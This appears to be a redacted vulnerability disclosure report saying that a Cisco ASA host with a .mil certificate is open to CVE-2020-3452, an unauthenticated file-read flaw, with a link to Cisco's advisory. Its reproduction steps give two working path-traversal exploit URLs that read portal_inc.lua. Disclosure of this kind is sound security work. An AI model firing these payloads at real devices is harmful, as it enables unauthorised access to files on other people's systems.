[CVE-2020-3452] Unauthenticated file read in Cisco ASA

i found out that https://█████████/ was vulnerable to CVE-2020-3452 The IP has a SSL certificate pointing to █████████ curl -kv https://██████████/ Output ``` Server certificate: * subject: C=US; ████.mil ``` ## Impact Anyone can read any file present on the server. ## System Host(s) ███ ## Affected Product(s) and Version(s) ## CVE Numbers CVE-2020-3452 ## Steps to Reproduce You can test it by visiting the URL: 1. https://██████████/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua 2. https://███████/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ ## Suggested Mitigation/Remediation Actions https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86